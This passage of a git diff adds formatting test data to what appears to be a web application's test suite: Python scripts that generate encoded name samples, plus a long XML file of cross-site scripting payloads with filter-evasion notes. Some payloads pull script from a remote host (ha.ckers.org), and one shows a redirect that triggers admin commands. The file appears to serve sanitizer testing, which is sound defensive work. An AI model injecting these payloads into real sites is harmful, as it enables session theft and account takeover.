utf-8.txt > entitized.txt" + sys.exit(2) + + sys.stdin = codecs.getreader("utf-8")(sys.stdin) + sys.stdout = codecs.getwriter("ascii")(sys.stdout) + + lines = sys.stdin.readlines() + sys.stdout.write( "\n".join(map(entitize, lines)) ) diff --git a/tests/data/formatting/utf-8/entitized.txt b/tests/data/formatting/utf-8/entitized.txt new file mode 100644 index 0000000000..a29c9f9216 --- /dev/null +++ b/tests/data/formatting/utf-8/entitized.txt @@ -0,0 +1,5 @@ +章子怡 +François Truffaut +საქართველო +Björk Guðmundsdóttir +宮崎 駿 \ No newline at end of file diff --git a/tests/data/formatting/utf-8/u-urlencode.py b/tests/data/formatting/utf-8/u-urlencode.py new file mode 100644 index 0000000000..c20a14f1f8 --- /dev/null +++ b/tests/data/formatting/utf-8/u-urlencode.py @@ -0,0 +1,24 @@ +# Generates u-urlencoded.txt from utf-8.txt +# +# u-urlencoded.txt is used by Tests_Formatting_UrlEncodedToEntities + +import codecs +import sys + +def uurlencode(line): + """Use %u[hexvalue] percent encoding.""" + line = line.strip() + line = ["%%u%04X" % ord(s) for s in line] + return "".join(line) + +if __name__ == "__main__": + args = sys.argv[1:] + if args and args[0] in ("-h", "--help"): + print "Usage: python u-urlencode.py < utf-8.txt > u-urlencoded.txt" + sys.exit(2) + + sys.stdin = codecs.getreader("utf-8")(sys.stdin) + sys.stdout = codecs.getwriter("ascii")(sys.stdout) + + lines = sys.stdin.readlines() + sys.stdout.write( "\n".join(map(uurlencode, lines)) ) diff --git a/tests/data/formatting/utf-8/u-urlencoded.txt b/tests/data/formatting/utf-8/u-urlencoded.txt new file mode 100644 index 0000000000..ad4e422c75 --- /dev/null +++ b/tests/data/formatting/utf-8/u-urlencoded.txt @@ -0,0 +1,5 @@ +%u7AE0%u5B50%u6021 +%u0046%u0072%u0061%u006E%u00E7%u006F%u0069%u0073%u0020%u0054%u0072%u0075%u0066%u0066%u0061%u0075%u0074 +%u10E1%u10D0%u10E5%u10D0%u10E0%u10D7%u10D5%u10D4%u10DA%u10DD +%u0042%u006A%u00F6%u0072%u006B%u0020%u0047%u0075%u00F0%u006D%u0075%u006E%u0064%u0073%u0064%u00F3%u0074%u0074%u0069%u0072 +%u5BAE%u5D0E%u3000%u99FF diff --git a/tests/data/formatting/utf-8/urlencode.py b/tests/data/formatting/utf-8/urlencode.py new file mode 100644 index 0000000000..d29907f24b --- /dev/null +++ b/tests/data/formatting/utf-8/urlencode.py @@ -0,0 +1,33 @@ +# Generates urlencoded.txt from utf-8.txt +# +# urlencoded.txt is used by Tests_Formatting_Utf8UriEncode + +import urllib, codecs, re +import sys + +# uncapitalize pct-encoded values, leave the rest alone +capfix = re.compile("%([0-9A-Z]{2})"); +def fix(match): + octet = match.group(1) + intval = int(octet, 16) + if intval < 128: + return chr(intval).lower() + return '%' + octet.lower() + +def urlencode(line): + """Percent-encode each byte of non-ASCII unicode characters.""" + line = urllib.quote(line.strip().encode("utf-8")) + line = capfix.sub(fix, line) + return line + +if __name__ == "__main__": + args = sys.argv[1:] + if args and args[0] in ("-h", "--help"): + print "Usage: python urlencode.py < utf-8.txt > urlencoded.txt" + sys.exit(2) + + sys.stdin = codecs.getreader("utf-8")(sys.stdin) + sys.stdout = codecs.getwriter("ascii")(sys.stdout) + + lines = sys.stdin.readlines() + sys.stdout.write( "\n".join(map(urlencode, lines)) ) diff --git a/tests/data/formatting/utf-8/urlencoded.txt b/tests/data/formatting/utf-8/urlencoded.txt new file mode 100644 index 0000000000..930bf13ff6 --- /dev/null +++ b/tests/data/formatting/utf-8/urlencoded.txt @@ -0,0 +1,5 @@ +%e7%ab%a0%e5%ad%90%e6%80%a1 +Fran%c3%a7ois Truffaut +%e1%83%a1%e1%83%90%e1%83%a5%e1%83%90%e1%83%a0%e1%83%97%e1%83%95%e1%83%94%e1%83%9a%e1%83%9d +Bj%c3%b6rk Gu%c3%b0mundsd%c3%b3ttir +%e5%ae%ae%e5%b4%8e%e3%80%80%e9%a7%bf diff --git a/tests/data/formatting/utf-8/utf-8.txt b/tests/data/formatting/utf-8/utf-8.txt new file mode 100644 index 0000000000..1596029d20 --- /dev/null +++ b/tests/data/formatting/utf-8/utf-8.txt @@ -0,0 +1,5 @@ +ç« å­æ€¡ +François Truffaut +სáƒáƒ¥áƒáƒ áƒ—ველრ+Björk Guðmundsdóttir +宮崎 駿 diff --git a/tests/data/formatting/windows1252.py b/tests/data/formatting/windows1252.py new file mode 100644 index 0000000000..a4fe402703 --- /dev/null +++ b/tests/data/formatting/windows1252.py @@ -0,0 +1,27 @@ +# Generates test data for functions converting between +# dodgy windows-1252-only values and their unicode counterparts + +unichars = ["201A", "0192", "201E", "2026", "2020", "2021", + "02C6", "2030", "0160", "2039", "0152", "2018", + "2019", "201C", "201D", "2022", "2013", "2014", + "02DC", "2122", "0161", "203A", "0153", "0178"]; + +winpoints = [] +unipoints = [] + +for char in unichars: + char = unichr(int(char, 16)) + dec = ord(char) + win = ord(char.encode("windows-1252")) + + unipoints.append(dec) + winpoints.append(win) + +def entitize(s): + return "&#%s;" % s + +winpoints = map(entitize, winpoints) +unipoints = map(entitize, unipoints) + +print "".join(winpoints), "".join(unipoints) + diff --git a/tests/data/formatting/xssAttacks.xml b/tests/data/formatting/xssAttacks.xml new file mode 100644 index 0000000000..017bf1f347 --- /dev/null +++ b/tests/data/formatting/xssAttacks.xml @@ -0,0 +1,976 @@ + + + + XSS Locator + ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} + Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. You'll need to replace the "&" with "%26" if you are submitting this XSS string via HTTP GET or it will be ignored and everything after it will be interpreted as another variable. Tip: If you're in a rush and need to quickly check a page, often times injecting the deprecated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + XSS Quick Test + '';!--"<XSS>=&{()} + If you don't have much space, this string is a nice compact XSS injection check. View source after injecting it and look for <XSS versus &lt;XSS to see if it is vulnerable. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + SCRIPT w/Alert() + <SCRIPT>alert('XSS')</SCRIPT> + Basic injection attack + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + SCRIPT w/Source File + <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> + No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here). + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + SCRIPT w/Char Code + <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> + Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + BASE + <BASE HREF="javascript:alert('XSS');//"> + Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like "images/image.jpg" rather than full paths. If the path includes a leading forward slash like "/images/image.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + BGSOUND + <BGSOUND SRC="javascript:alert('XSS');"> + BGSOUND + + Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] + + + BODY background-image + <BODY BACKGROUND="javascript:alert('XSS');"> + BODY image + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] + + + BODY ONLOAD + <BODY ONLOAD=alert('XSS')> + BODY tag (I like this method because it doesn't require using any variants of "javascript:" or "<SCRIPT..." to accomplish the XSS attack) + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + DIV background-image 1 + <DIV STYLE="background-image: url(javascript:alert('XSS'))"> + Div background-image + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + DIV background-image 2 + <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> + Div background-image plus extra characters. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8203, 12288, 65279) + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + DIV expression + <DIV STYLE="width: expression(alert('XSS'));"> + Div expression - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression" + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + FRAME + <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> + Frame (Frames have the same sorts of XSS problems as iframes). + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + IFRAME + <IFRAME SRC="javascript:alert('XSS');"></IFRAME> + Iframe (If iframes are allowed there are a lot of other XSS problems as well). + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + INPUT Image + <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> + INPUT Image + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] + + + IMG w/JavaScript Directive + <IMG SRC="javascript:alert('XSS');"> + Image XSS using the JavaScript directive. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] + + + IMG No Quotes/Semicolon + <IMG SRC=javascript:alert('XSS')> + No quotes and no semicolon + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] + + + IMG Dynsrc + <IMG DYNSRC="javascript:alert('XSS');"> + IMG Dynsrc + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + IMG Lowsrc + <IMG LOWSRC="javascript:alert('XSS');"> + IMG Lowsrc + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + IMG Embedded commands 1 + <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> + This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc... This is one of the lesser used but more useful XSS vectors. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + IMG Embedded commands 2 + Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser + IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC="http://badguy.com/a.jpg"> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this). + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + IMG STYLE w/expression + exp/*<XSS STYLE='no\xss:noxss("*//*"); +xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> + IMG STYLE with expression (this is really a hybrid of several CSS XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like the other CSS examples this can send IE into a loop). + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + List-style-image + <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS + Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + IMG w/VBscript + <IMG SRC='vbscript:msgbox("XSS")'> + VBscript in an image + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + LAYER + <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> + Layer (Older Netscape only) + + Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>] + + + Livescript + <IMG SRC="livescript:[code]"> + Livescript (Older Netscape only) + + Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>] + + + US-ASCII encoding + %BCscript%BEalert(%A2XSS%A2)%BC/script%BE + Found by Kurt Huwig http://www.iku-ag.de/ This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the hosts transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="ns">NS4</span>] + + + META + <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> + The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] + + + META w/data:URL + <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> + This is nice because it also doesn't have anything visibly that has the word SCRIPT or the JavaScript directive in it, since it utilizes base64 encoding. Please see http://www.ietf.org/rfc/rfc2397.txt for more details + + Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + META w/additional URL parameter + <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> + Meta with additional URL parameter. If the target website attempts to see if the URL contains an "http://" you can evade it with the following technique (Submitted by Moritz Naumann http://www.moritz-naumann.com) + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + Mocha + <IMG SRC="mocha:[code]"> + Mocha (Older Netscape only) + + Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>] + + + OBJECT + <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> + If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag. The linked file is actually an HTML file that can contain your XSS + + Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] + + + OBJECT w/Embedded XSS + <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> + Using an OBJECT tag you can embed XSS directly (this is unverified). + + Browser support: + + + Embed Flash + <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> + Using an EMBED tag you can embed a Flash movie that contains XSS. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info). Demo: http://ha.ckers.org/weird/xssflash.html : + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + OBJECT w/Flash 2 + a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")"; eval(a+b+c+d); + Using this action script inside flash can obfuscate your XSS vector. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + STYLE + <STYLE TYPE="text/javascript">alert('XSS');</STYLE> + STYLE tag (Older versions of Netscape only) + + Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>] + + + STYLE w/Comment + <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> + STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one) + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + STYLE w/Anonymous HTML + <XSS STYLE="xss:expression(alert('XSS'))"> + Anonymous HTML with STYLE attribute (IE and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter) + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + STYLE w/background-image + <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> + STYLE tag using background-image. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + STYLE w/background + <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> + STYLE tag using background. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + Stylesheet + <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> + Stylesheet + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] + + + Remote Stylesheet 1 + <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> + Remote style sheet (using something as simple as a remote style sheet you can include your XSS as the style question redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] + + + Remote Stylesheet 2 + <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> + Remote style sheet part 2 (this works the same as above, but uses a <STYLE> tag instead of a <LINK> tag). A slight variation on this vector was used to hack Google Desktop http://www.hacker.co.il/security/ie/css_import.html. As a side note you can remote the end STYLE tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equal sign or a slash in your cross site scripting attack, which has come up at least once in the real world. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] + + + Remote Stylesheet 3 + <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> + Remote style sheet part 3. This only works in Opera but is fairly tricky. Setting a link header is not part of the HTTP1.1 spec. However, some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://ha.ckers.org/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox. + + Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] + + + Remote Stylesheet 4 + <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> + Remote style sheet part 4. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites. + + Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="ns">O8.54</span>] + + + TABLE + <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> + Table background (who would have thought tables were XSS targets... except me, of course). + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] + + + TD + <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE> + TD background. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>] + + + XML namespace + <HTML xmlns:xss> +<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> +<xss:xss>XSS</xss:xss> +</HTML> + XML namespace. The .htc file must be located on the server as your XSS vector. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + XML data island w/CDATA + <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> +</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> + XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 IE rendering engine mode) - vector found by Sec Consult http://www.sec-consult.html while auditing Yahoo. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + XML data island w/comment + <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> +<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> + XML data island with comment obfuscation (doesn't use CDATA fields, but rather uses comments to break up the javascript directive) + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + XML (locally hosted) + <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML> +<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> + Locally hosted XML with embedded JavaScript that is generated using an XML data island. This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains the cross site scripting vector. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + XML HTML+TIME + <HTML><BODY> +<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> +<?import namespace="t" implementation="#default#time2"> +<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML> + HTML+TIME in XML. This is how Grey Magic http://www.greymagic.com/security/advisories/gm005-mc/ hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + Commented-out Block + <!--[if gte IE 4]> +<SCRIPT>alert('XSS');</SCRIPT> +<![endif]--> + Downlevel-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore it does not need to be removed, which allows our XSS vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + Cookie Manipulation + <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> + Cookie manipulation - admittedly this is pretty obscure but I have seen a few examples where <META is allowed and you can user it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc). + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + Local .htc file + <XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> + This uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] + + + Rename .js to .jpg + <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> + Assuming you can only fit in a few characters and it filters against ".js" you can rename your JavaScript file to an image as an XSS vector. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + SSI + <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> + SSI (Server Side Includes) requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + PHP + <? echo('<SCR)'; +echo('IPT>alert("XSS")</SCRIPT>'); ?> + PHP - requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues. + + Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] + + + JavaScript Includes + <BR SIZE="&{alert('XSS')}"> + &JavaScript includes (works in Netscape 4.x). + + Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>] [<span class="s">NS4</span>] + + + Character Encoding Example + < +%3C +&lt +&lt; +&LT +&LT; +&#60 +&#060 +&#0060 +&#00060 +&#000060 +&#0000060 +&#60; +&#060; +&#0060; +&#00060; +&#000060; +&#0000060; +&#x3c +&#x03c +&#x003c +&#x0003c +&#x00003c +&#x000003c +&#x3c; +&#x03c; +&#x003c; 